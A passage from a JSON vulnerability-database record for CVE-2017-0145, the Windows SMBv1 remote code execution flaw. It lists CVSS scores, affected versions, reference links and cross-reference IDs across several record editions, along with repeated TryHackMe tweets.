"NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.1, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96705", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96705"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "417c6d7b4dbe6355f9992d91434470ae0c7af215000d332be5b9e9437e22f4a4", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "2c23b77afb0f021934f5effbf46ef757", "key": "extraReferences"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 80}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "c41048ea6dcd4e7327ea455828df8d955bd52536e1a117875e7433d4d6d1bd94", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 60}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 9.1, "vector": "NONE"}}, "hash": "ada0d184ee68bfdc5abae7e38df8ceb1ee5f89184881509c19bce8dd915a641f", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a2952ad882dabbecbfdcf3070d90cae6", "key": "references"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": 